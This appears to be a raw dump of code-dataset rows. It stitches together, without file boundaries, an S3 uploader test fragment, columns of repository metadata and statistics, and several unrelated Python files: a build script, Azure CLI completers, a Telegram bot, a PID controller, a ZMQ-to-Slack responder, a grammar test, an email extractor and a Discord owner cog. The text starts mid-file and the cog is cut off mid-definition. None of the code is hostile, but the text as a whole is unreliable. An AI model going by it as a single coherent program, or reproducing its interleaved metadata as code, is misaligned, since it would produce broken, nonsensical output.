def test_upload_part(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
upload.upload_part("Part 1")
upload.upload_part("Part 2")
assert [
{
"Body": "Part 1",
"UploadId": 1,
"PartNumber": 1,
"Bucket": "bucket",
"Key": "books.mrc",
},
{
"Body": "Part 2",
"UploadId": 1,
"PartNumber": 2,
"Bucket": "bucket",
"Key": "books.mrc",
},
] == uploader.client.parts
assert 3 == upload.part_number
assert [
{"ETag": "etag", "PartNumber": 1},
{"ETag": "etag", "PartNumber": 2},
] == upload.parts
uploader.client.fail_with = Exception("Error!")
pytest.raises(Exception, upload.upload_part, "Part 3")
def test_complete(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
upload.upload_part("Part 1")
upload.upload_part("Part 2")
upload.complete()
assert [
{
"Bucket": "bucket",
"Key": "books.mrc",
"UploadId": 1,
"MultipartUpload": {
"Parts": [
{"ETag": "etag", "PartNumber": 1},
{"ETag": "etag", "PartNumber": 2},
],
},
}
] == uploader.client.uploads
def test_abort(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
upload.upload_part("Part 1")
upload.upload_part("Part 2")
upload.abort()
assert [] == uploader.client.parts
@pytest.mark.minio
class TestS3UploaderIntegration(S3UploaderIntegrationTest):
@parameterized.expand(
[
(
"using_s3_uploader_and_open_access_bucket",
functools.partial(
S3Uploader,
host=S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST,
),
S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY,
"test-bucket",
True,
),
(
"using_s3_uploader_and_protected_access_bucket",
functools.partial(
S3Uploader,
host=S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST,
),
S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY,
"test-bucket",
False,
),
(
"using_minio_uploader_and_open_access_bucket",
MinIOUploader,
S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY,
"test-bucket",
True,
{
MinIOUploaderConfiguration.ENDPOINT_URL: S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL
},
),
(
"using_minio_uploader_and_protected_access_bucket",
MinIOUploader,
S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY,
"test-bucket",
False,
{
MinIOUploaderConfiguration.ENDPOINT_URL: S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL
},
),
]
)
def test_mirror(
self, name, uploader_class, bucket_type, bucket_name, open_access, settings=None
):
# Arrange
book_title = "1234567890"
book_content = "1234567890"
identifier = Identifier(type=Identifier.ISBN, identifier=book_title)
representation = Representation(
content=book_content, media_type=Representation.EPUB_MEDIA_TYPE
)
buckets = {
bucket_type: bucket_name,
}
if settings:
settings.update(buckets)
else:
settings = buckets
s3_uploader = self._create_s3_uploader(
uploader_class=uploader_class, **settings
)
self.minio_s3_client.create_bucket(Bucket=bucket_name)
# Act
book_url = s3_uploader.book_url(identifier, open_access=open_access)
s3_uploader.mirror_one(representation, book_url)
# Assert
response = self.minio_s3_client.list_objects(Bucket=bucket_name)
assert "Contents" in response
assert len(response["Contents"]) == 1
[object] = response["Contents"]
assert object["Key"] == "ISBN/{0}.epub".format(book_title)
| 35.105572
| 145
| 0.56497
| 4,787
| 47,884
| 5.406727
| 0.096094
| 0.021791
| 0.014605
| 0.016227
| 0.585117
| 0.53346
| 0.498725
| 0.458852
| 0.405301
| 0.373657
| 0
| 0.027131
| 0.334934
| 47,884
| 1,363
| 146
| 35.131328
| 0.785593
| 0.074597
| 0
| 0.456779
| 0
| 0.030027
| 0.210576
| 0.063339
| 0
| 0
| 0
| 0
| 0.075523
| 1
| 0.035487
| false
| 0.010009
| 0.012739
| 0.00091
| 0.065514
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1382e742de1eb49e756dcd17000e8fccc4bc6d6c
| 1,114
|
py
|
Python
|
lbry/scripts/set_build.py
|
vanshdevgan/lbry-sdk
|
3624a3b450945235edcf76971e18c898fba67455
|
[
"MIT"
] | null | null | null |
lbry/scripts/set_build.py
|
vanshdevgan/lbry-sdk
|
3624a3b450945235edcf76971e18c898fba67455
|
[
"MIT"
] | null | null | null |
lbry/scripts/set_build.py
|
vanshdevgan/lbry-sdk
|
3624a3b450945235edcf76971e18c898fba67455
|
[
"MIT"
] | null | null | null |
"""Set the build version to be 'qa', 'rc', 'release'"""
import sys
import os
import re
import logging
log = logging.getLogger()
log.addHandler(logging.StreamHandler())
log.setLevel(logging.DEBUG)
def get_build_type(travis_tag=None):
if not travis_tag:
return "qa"
log.debug("getting build type for tag: \"%s\"", travis_tag)
if re.match(r'v\d+\.\d+\.\d+rc\d+$', travis_tag):
return 'rc'
elif re.match(r'v\d+\.\d+\.\d+$', travis_tag):
return 'release'
return 'qa'
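# Illustrative behaviour of get_build_type (not part of the original script);
# the tag strings are example values only:
#   get_build_type(None)            -> "qa"       (no tag set)
#   get_build_type("v0.53.0rc1")    -> "rc"       (matches v\d+.\d+.\d+rc\d+)
#   get_build_type("v0.53.0")       -> "release"  (matches v\d+.\d+.\d+)
#   get_build_type("nightly-build") -> "qa"       (anything else)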
def main():
root_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
build_type_path = os.path.join(root_dir, 'lbry', 'build_type.py')
log.debug("configuring build type file: %s", build_type_path)
travis_commit = os.environ['TRAVIS_COMMIT'][:6]
build_type = get_build_type(os.environ.get('TRAVIS_TAG', None))
log.debug("setting build type=%s, build commit=%s", build_type, travis_commit)
with open(build_type_path, 'w') as f:
f.write(f"BUILD = \"{build_type}\"\nBUILD_COMMIT = \"{travis_commit}\"\n")
if __name__ == '__main__':
sys.exit(main())
| 30.108108
| 82
| 0.658887
| 171
| 1,114
| 4.064327
| 0.362573
| 0.155396
| 0.064748
| 0.025899
| 0.080576
| 0.034532
| 0.034532
| 0
| 0
| 0
| 0
| 0.001076
| 0.166068
| 1,114
| 36
| 83
| 30.944444
| 0.74704
| 0.043986
| 0
| 0
| 0
| 0
| 0.21152
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.148148
| 0
| 0.37037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1383ee1f9bdf4c8acf135f0e8788f23793efa056
| 1,627
|
py
|
Python
|
src/azure-cli/azure/cli/command_modules/policyinsights/_completers.py
|
YuanyuanNi/azure-cli
|
63844964374858bfacd209bfe1b69eb456bd64ca
|
[
"MIT"
] | 3,287
|
2016-07-26T17:34:33.000Z
|
2022-03-31T09:52:13.000Z
|
src/azure-cli/azure/cli/command_modules/policyinsights/_completers.py
|
YuanyuanNi/azure-cli
|
63844964374858bfacd209bfe1b69eb456bd64ca
|
[
"MIT"
] | 19,206
|
2016-07-26T07:04:42.000Z
|
2022-03-31T23:57:09.000Z
|
src/azure-cli/azure/cli/command_modules/policyinsights/_completers.py
|
YuanyuanNi/azure-cli
|
63844964374858bfacd209bfe1b69eb456bd64ca
|
[
"MIT"
] | 2,575
|
2016-07-26T06:44:40.000Z
|
2022-03-31T22:56:06.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.decorators import Completer
from azure.cli.core.commands.client_factory import get_subscription_id
from ._client_factory import cf_policy_insights
@Completer
def get_policy_remediation_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument
client = cf_policy_insights(cmd.cli_ctx)
sub = get_subscription_id(cmd.cli_ctx)
rg = getattr(namespace, 'resource_group_name', None)
management_group = getattr(namespace, 'management_group_name', None)
if rg:
result = client.remediations.list_for_resource_group(subscription_id=sub, resource_group_name=rg)
elif management_group:
result = client.remediations.list_for_management_group(management_group_id=management_group)
else:
result = client.remediations.list_for_subscription(subscription_id=sub)
return [i.name for i in result]
@Completer
def get_policy_metadata_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument
client = cf_policy_insights(cmd.cli_ctx).policy_metadata
from azure.mgmt.policyinsights.models import QueryOptions
query_options = QueryOptions(top=2000)
return [metadata.name for metadata in client.list(query_options) if metadata.name.startswith(prefix)]
| 45.194444
| 112
| 0.696374
| 190
| 1,627
| 5.710526
| 0.384211
| 0.082949
| 0.04424
| 0.077419
| 0.262673
| 0.176959
| 0.176959
| 0.176959
| 0.176959
| 0.176959
| 0
| 0.002793
| 0.119852
| 1,627
| 35
| 113
| 46.485714
| 0.754888
| 0.245851
| 0
| 0.090909
| 0
| 0
| 0.032787
| 0.017213
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.181818
| 0
| 0.363636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13844a293f37e75b2bbbb1208093a4013b133018
| 646
|
py
|
Python
|
Bot Telegram.py
|
devilnotcry77/devil_not_cry
|
a9d342d053c788ec6db2d1c5967ed55104b40045
|
[
"Apache-2.0"
] | null | null | null |
Bot Telegram.py
|
devilnotcry77/devil_not_cry
|
a9d342d053c788ec6db2d1c5967ed55104b40045
|
[
"Apache-2.0"
] | null | null | null |
Bot Telegram.py
|
devilnotcry77/devil_not_cry
|
a9d342d053c788ec6db2d1c5967ed55104b40045
|
[
"Apache-2.0"
] | null | null | null |
from aiogram import Bot, types
from aiogram.dispatcher import Dispatcher
from aiogram.utils import executor
TOKEN = "Token for you bot"
bot = Bot(token=TOKEN)
dp = Dispatcher(bot)
@dp.message_handler(commands=['start', 'help'])
async def send_welcome(msg: types.Message):
    # Replies with a greeting; "Добро пожаловать" means "Welcome".
    await msg.reply(f'Добро пожаловать, {msg.from_user.first_name}')
@dp.message_handler(content_types=['text'])
async def get_text_messages(msg: types.Message):
    if msg.text.lower() == 'привет':  # 'привет' == 'hi'
        await msg.answer('Привет!')  # 'Hi!'
    else:
        await msg.answer('Я не понимаю')  # 'I do not understand'
if __name__ == '__main__':
executor.start_polling(dp)
| 32.3
| 79
| 0.704334
| 90
| 646
| 4.844444
| 0.5
| 0.075688
| 0.073395
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167183
| 646
| 20
| 80
| 32.3
| 0.810409
| 0
| 0
| 0
| 0
| 0
| 0.16879
| 0.058917
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.176471
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1385311ad77efabb909223d3edfa32108eab2458
| 4,984
|
py
|
Python
|
timedpid.py
|
DrGFreeman/PyTools
|
795e06b5a07f49a990df3c545d2d103b16dd8b4d
|
[
"MIT"
] | 1
|
2020-04-20T04:45:47.000Z
|
2020-04-20T04:45:47.000Z
|
timedpid.py
|
DrGFreeman/PyTools
|
795e06b5a07f49a990df3c545d2d103b16dd8b4d
|
[
"MIT"
] | null | null | null |
timedpid.py
|
DrGFreeman/PyTools
|
795e06b5a07f49a990df3c545d2d103b16dd8b4d
|
[
"MIT"
] | 1
|
2020-04-20T04:45:51.000Z
|
2020-04-20T04:45:51.000Z
|
# timedpid.py
# Source: https://github.com/DrGFreeman/PyTools
#
# MIT License
#
# Copyright (c) 2017 Julien de la Bruere-Terreault <drgfreeman@tuta.io>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This module defines a simple Proportional - Integral - Derivative (PID)
# controller with different time step calculation methods. This is a python
# implementation of my Arduino TimedPID library which can be found at
# https://github.com/DrGFreeman/TimedPID. Refer to this repository for detailed
# documentation.
import time
class TimedPID:
# Constructor
def __init__(self, kp = 1., ki = 0., kd = 0.):
self._kp = kp
self._ki = ki
self._kd = kd
self._cmdMin = None
self._cmdMax = None
self._boundRange = False
self._errorIntegral = 0.
self._errorPrevious = 0.
self._lastCmdTime = time.time()
def getCmd(self, setPoint, procVar):
"""Gets the PID command without time step.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled.
No time step is used (assumed = 1)."""
# Calculate error terms
error = setPoint - procVar
self._errorIntegral += error
errorDerivative = error - self._errorPrevious
# Set last error to current error
self._errorPrevious = error
# Calculate command
cmd = self._kp * error + self._ki * self._errorIntegral + \
self._kd * errorDerivative
# Return bound command
return self._boundCmd(cmd)
def getCmdAutoStep(self, setPoint, procVar):
"""Gets the PID command with automatic time step calculation.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled,
The time step is calculated as the time since the last call to the
method."""
# Calculate time step
currentTime = time.time()
timeStep = currentTime - self._lastCmdTime
# Set last time method was called to current time
self._lastCmdTime = currentTime
# Get command
return self.getCmdStep(setPoint, procVar, timeStep)
def getCmdStep(self, setPoint, procVar, timeStep):
"""Gets the PID command with a specified time step.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled,
timeStep is the time step."""
# Calculate error terms
error = setPoint - procVar
self._errorIntegral += (error + self._errorPrevious) / 2 * timeStep
errorDerivative = (error - self._errorPrevious) / timeStep
# Set last error to current error
self._errorPrevious = error
# Calculate command
cmd = self._kp * error + self._ki * self._errorIntegral + \
self._kd * errorDerivative
# Return bound command
return self._boundCmd(cmd)
def setCmdRange(self, cmdMin, cmdMax):
"""Sets the maximum command range. Commands calculated outside the
cmdMin and cmdMax will be set to cmdMin or cmdMax respectively."""
self._cmdMin = cmdMin
self._cmdMax = cmdMax
self._boundRange = True
def setGains(self, kp = 1., ki = 0., kd = 0.):
"""Sets the proportional, integral and derivative terms."""
self._kp = kp
self._ki = ki
self._kd = kd
def reset(self):
"""Resets the PID error terms and timer."""
self._errorIntegral = 0.
self._errorPrevious = 0.
self._lastCmdTime = time.time()
# Private methods
def _boundCmd(self, cmd):
"""Bounds the command within the range _cmdMin to _cmdMax."""
if self._boundRange:
if cmd < self._cmdMin:
cmd = self._cmdMin
elif cmd > self._cmdMax:
cmd = self._cmdMax
return cmd
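# --- Illustrative usage sketch (not part of the original module). ---
# A minimal simulated control loop exercising the class above; the gains,
# set point and trivial first-order "plant" model are assumptions chosen
# purely for demonstration.
if __name__ == '__main__':
    pid = TimedPID(kp=0.8, ki=0.2, kd=0.05)
    pid.setCmdRange(-10., 10.)

    setPoint = 50.
    procVar = 0.
    timeStep = 0.1
    for _ in range(200):
        # Fixed time step; getCmdAutoStep() would measure it instead.
        cmd = pid.getCmdStep(setPoint, procVar, timeStep)
        # Toy plant: the process variable moves toward the command.
        procVar += cmd * timeStep
    print("Process variable after 200 steps: {:.2f}".format(procVar))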
| 36.647059
| 80
| 0.664125
| 626
| 4,984
| 5.209265
| 0.335463
| 0.026986
| 0.033732
| 0.015639
| 0.317081
| 0.309414
| 0.309414
| 0.279362
| 0.279362
| 0.227231
| 0
| 0.004374
| 0.266051
| 4,984
| 135
| 81
| 36.918519
| 0.887097
| 0.534912
| 0
| 0.423077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.019231
| 0
| 0.269231
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13863d63148372da4df5a7856bdd98b8b8e90e54
| 3,051
|
py
|
Python
|
pmon/zmq_responder.py
|
bernd-clemenz/pmon
|
8b61de4864ffed2d7ee224c283090ed1948533ae
|
[
"MIT"
] | 1
|
2020-06-01T19:20:09.000Z
|
2020-06-01T19:20:09.000Z
|
pmon/zmq_responder.py
|
bernd-clemenz/pmon
|
8b61de4864ffed2d7ee224c283090ed1948533ae
|
[
"MIT"
] | null | null | null |
pmon/zmq_responder.py
|
bernd-clemenz/pmon
|
8b61de4864ffed2d7ee224c283090ed1948533ae
|
[
"MIT"
] | null | null | null |
#
# -*- coding: utf-8-*-
# receives messages via zmq and executes some simple
# operations.
#
# (c) ISC Clemenz & Weinbrecht GmbH 2018
#
import json
import requests
import zmq
import pmon
class ZmqResponder(object):
context = None
socket = None
def __init__(self):
"""
Constructor.
"""
self.cfg = pmon.CFG
self.log = pmon.LOG
def __enter__(self):
self.bind()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
def bind(self):
self.log.info("Binding ZMQ")
port = self.cfg['pmon']['zmq.port']
bind_str = "tcp://*:{0}".format(port)
self.context = zmq.Context(1)
self.socket = self.context.socket(zmq.REP)
self.socket.bind(bind_str)
def done(self):
self.log.info("Disconnecting ZMQ")
if self.socket is not None:
self.socket.close()
if self.context is not None:
self.context.term()
def _read_message(self):
self.log.debug("Wait for incoming message")
msg = self.socket.recv()
_msg = msg.decode('utf-8')
return json.loads(_msg)
@staticmethod
def _make_slack_payload(message):
slack_payload = dict()
slack_payload['text'] = message['msg']
attachments = list()
slack_payload['attachments'] = attachments
attachment = dict()
attachment["fallback"] = message['msg']
attachment['text'] = message['msg']
attachment['title'] = message['msg.type']
attachment['author_name'] = message['from']
attachments.append(attachment)
return slack_payload
def _report_message_to_slack(self, message):
"""
Send a message to Slack Web-Hook.
        :param message: the message record to be sent to slack
:return: None
"""
self.log.debug("Forwarding message to slack")
url = self.cfg['pmon']['slack.hook']
payload = json.dumps(self._make_slack_payload(message))
headers = {'Accept': 'application/json',
'Content-Type': 'application/json',
'Content-Encoding': 'utf8',
'Content-Length': str(len(payload))}
try:
rsp = requests.post(url, data=payload, headers=headers)
if rsp.status_code != requests.codes.ok:
self.log.warn("problem sending to slack: {0}".format(rsp.status_code))
except Exception as x:
self.log.error(str(x))
def respond(self):
go_on = True
while go_on:
message = self._read_message()
self.log.debug("Message: {0}, {1}".format(message['msg.type'],
message['msg']))
self.socket.send_string('ACK')
try:
self._report_message_to_slack(message)
except Exception as x:
self.log.error(str(x))
go_on = True if message['msg'] != 'stop' else False
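# --- Illustrative client sketch (not part of the original module). ---
# Shows the message shape that ZmqResponder.respond() expects ('msg',
# 'msg.type' and 'from' keys) and how a REQ socket could talk to it;
# the port number and payload values are assumptions for demonstration.
if __name__ == '__main__':
    req_context = zmq.Context(1)
    req_socket = req_context.socket(zmq.REQ)
    req_socket.connect("tcp://localhost:5555")  # must match cfg['pmon']['zmq.port']
    payload = {'msg.type': 'info', 'from': 'example-client', 'msg': 'hello'}
    req_socket.send_string(json.dumps(payload))
    print(req_socket.recv().decode('utf-8'))  # the responder answers with 'ACK'
    # Sending {'msg': 'stop', ...} makes respond() leave its loop.
    req_socket.close()
    req_context.term()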
| 29.336538
| 86
| 0.561455
| 351
| 3,051
| 4.74359
| 0.37037
| 0.037838
| 0.033634
| 0.018018
| 0.040841
| 0.040841
| 0.040841
| 0.040841
| 0.040841
| 0
| 0
| 0.005722
| 0.312684
| 3,051
| 103
| 87
| 29.621359
| 0.788269
| 0.078663
| 0
| 0.083333
| 0
| 0
| 0.122903
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.055556
| 0
| 0.263889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138645ddd1d47197cec66a63b6f187e4f2176f57
| 423
|
py
|
Python
|
test/test_substitute.py
|
sanskrit/padmini
|
8e7e8946a7d2df9c941f689ea4bc7b6ebb7ca1d0
|
[
"MIT"
] | 1
|
2022-03-01T05:05:04.000Z
|
2022-03-01T05:05:04.000Z
|
test/test_substitute.py
|
sanskrit/padmini
|
8e7e8946a7d2df9c941f689ea4bc7b6ebb7ca1d0
|
[
"MIT"
] | null | null | null |
test/test_substitute.py
|
sanskrit/padmini
|
8e7e8946a7d2df9c941f689ea4bc7b6ebb7ca1d0
|
[
"MIT"
] | null | null | null |
from padmini import operations as op
def test_yatha():
before = ("tAs", "Tas", "Ta", "mip")
after = ("tAm", "tam", "ta", "am")
for i, b in enumerate(before):
assert op.yatha(b, before, after) == after[i]
"""
def test_ti():
assert S.ti("ta", "e") == "te"
assert S.ti("AtAm", "e") == "Ate"
def test_antya():
assert S.antya("ti", "u") == "tu"
assert S.antya("te", "Am") == "tAm"
"""
| 19.227273
| 53
| 0.51773
| 63
| 423
| 3.428571
| 0.492063
| 0.12963
| 0.083333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.236407
| 423
| 21
| 54
| 20.142857
| 0.668731
| 0
| 0
| 0
| 0
| 0
| 0.091304
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1388c9a700adcd34c480eb91c770af0acaf65dde
| 2,186
|
py
|
Python
|
TVSaffiliations/extractemails_nogui.py
|
kmhambleton/LSST-TVSSC.github.io
|
2391fcdeddf83321825532aa7d7682b5dcf567f0
|
[
"CC-BY-3.0"
] | null | null | null |
TVSaffiliations/extractemails_nogui.py
|
kmhambleton/LSST-TVSSC.github.io
|
2391fcdeddf83321825532aa7d7682b5dcf567f0
|
[
"CC-BY-3.0"
] | 3
|
2018-06-15T10:12:39.000Z
|
2022-03-23T23:43:27.000Z
|
TVSaffiliations/extractemails_nogui.py
|
kmhambleton/LSST-TVSSC.github.io
|
2391fcdeddf83321825532aa7d7682b5dcf567f0
|
[
"CC-BY-3.0"
] | 5
|
2018-03-27T12:53:55.000Z
|
2019-07-17T15:54:09.000Z
|
# coding: utf-8
#just prints the emails of members of a group to stdout,
#both primary and secondary members
# run as
# $python extractemails_nogui.py "Tidal Disruption Events"
from __future__ import print_function
__author__ = 'Federica Bianco, NYU - GitHub: fedhere'
import sys
import pandas as pd
from argparse import ArgumentParser
from config import tvsfile
def parse_args(subglist):
""" Use ArgParser to build up the arguments we will use in our script
"""
stored_args = {}
# get the script name without the extension & use it to build up
# the json filename
parser = ArgumentParser(description='Selecting members by subgroup')
parser.add_argument('subgroup',
action='store',
default=None,
help='Choose the subgroup affiliation:' +
' -- '.join([s for s in subglist]))
args = parser.parse_args()
return args
if __name__ == '__main__':
if tvsfile is None:
print ("Required Argument: Google Doc file identifier (if you do not have it email federica!)")
sys.exit()
TVSMembers = pd.read_csv('https://docs.google.com/spreadsheets/d/' +
tvsfile +
'/export?gid=0&format=csv',
index_col=0)
subgroups = TVSMembers.primary.unique()
conf = parse_args([x for x in subgroups if str(x) != 'nan'])
primary = conf.subgroup
secondary = conf.subgroup
emails = TVSMembers[TVSMembers.primary == primary]['email'].values
print ("These are the members with primary affiliation with " + primary)
print ("")
print (' '.join([em + ','for em in emails]))
emails = TVSMembers[(TVSMembers.secondary == secondary) | (TVSMembers['secondary.1'] == secondary) | (TVSMembers['secondary.2'] == secondary)]['email'].values
print ("\n")
print ("These are the members with secondary affiliation with " + secondary)
print ("")
print (' '.join([em + ','for em in emails]))
print ("")
print ("If you also want their names and affiliations use: ")
print ("$python extractemailsW.py " + conf.subgroup)
| 35.836066
| 162
| 0.627173
| 261
| 2,186
| 5.157088
| 0.505747
| 0.020059
| 0.013373
| 0.017831
| 0.08321
| 0.08321
| 0.043091
| 0.043091
| 0
| 0
| 0
| 0.003096
| 0.261208
| 2,186
| 60
| 163
| 36.433333
| 0.830341
| 0.145929
| 0
| 0.125
| 0
| 0
| 0.272923
| 0.012945
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025
| false
| 0
| 0.125
| 0
| 0.175
| 0.3
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1388cb066414d3af45386f8ba3a988639cd4786c
| 20,373
|
py
|
Python
|
cogs/owner.py
|
Obsidian-Development/JDBot
|
315b0782126ac36fe934ac3ba2d7132710d58651
|
[
"MIT"
] | null | null | null |
cogs/owner.py
|
Obsidian-Development/JDBot
|
315b0782126ac36fe934ac3ba2d7132710d58651
|
[
"MIT"
] | 1
|
2021-11-09T14:30:49.000Z
|
2021-11-09T14:31:19.000Z
|
cogs/owner.py
|
Obsidian-Development/JDBot
|
315b0782126ac36fe934ac3ba2d7132710d58651
|
[
"MIT"
] | null | null | null |
from discord.ext import commands, menus
import utils
import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy
import traceback, textwrap
from discord.ext.menus.views import ViewMenuPages
class Owner(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(brief="a command to send mail")
async def mail(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.reply("User not found, returning Letter")
user = ctx.author
if user:
await ctx.reply("Please give me a message to use.")
message = await self.bot.wait_for("message",check = utils.check(ctx))
embed_message = discord.Embed(title=message.content, timestamp=(message.created_at), color=random.randint(0, 16777215))
embed_message.set_author(name=f"Mail from: {ctx.author}",icon_url=(ctx.author.display_avatar.url))
embed_message.set_footer(text = f"{ctx.author.id}")
embed_message.set_thumbnail(url = "https://i.imgur.com/1XvDnqC.png")
if (user.dm_channel is None):
await user.create_dm()
try:
await user.send(embed=embed_message)
except:
user = ctx.author
await user.send(content="Message failed. sending",embed=embed_message)
embed_message.add_field(name="Sent To:",value=str(user))
await self.bot.get_channel(855217084710912050).send(embed=embed_message)
@commands.command()
async def load(self, ctx, *, cog = None):
if cog:
try:
self.bot.load_extension(cog)
except Exception as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("Loaded cog(see if there's any errors)")
if cog is None:
await ctx.send("you can't ask to load no cogs.")
@commands.command()
async def reload(self, ctx, *, cog = None):
cog = cog or "all"
if cog == "all":
for x in list(self.bot.extensions):
try:
self.bot.reload_extension(x)
except commands.errors.ExtensionError as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("done reloading all cogs(check for any errors)")
else:
try:
self.bot.reload_extension(cog)
except commands.errors.ExtensionError as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("Cog reloaded :D (check for any errors)")
@commands.command()
async def unload(self, ctx, *, cog = None):
if cog:
try:
self.bot.unload_extension(cog)
except commands.errors.ExtensionError as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("Cog should be unloaded just fine :D.(check any errors)")
if cog is None:
await ctx.send("you can't ask to reload no cogs")
@commands.command()
async def shutdown(self, ctx):
await ctx.send("shutdown/logout time happening.")
await self.bot.close()
async def cog_check(self, ctx):
return await self.bot.is_owner(ctx.author)
async def cog_command_error(self, ctx, error):
if ctx.command and not ctx.command.has_error_handler():
await ctx.send(error)
traceback.print_exc()
#I need to fix all cog_command_error
@commands.command(brief="Changes Bot Status(Owner Only)")
async def status(self, ctx, *, args=None):
if await self.bot.is_owner(ctx.author):
if args:
await self.bot.change_presence(status=discord.Status.do_not_disturb, activity= discord.Activity(type=discord.ActivityType.watching,name=args))
if args is None:
await self.bot.change_presence(status=discord.Status.do_not_disturb)
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("That's an owner only command")
@commands.command(brief="Only owner command to change bot's nickname")
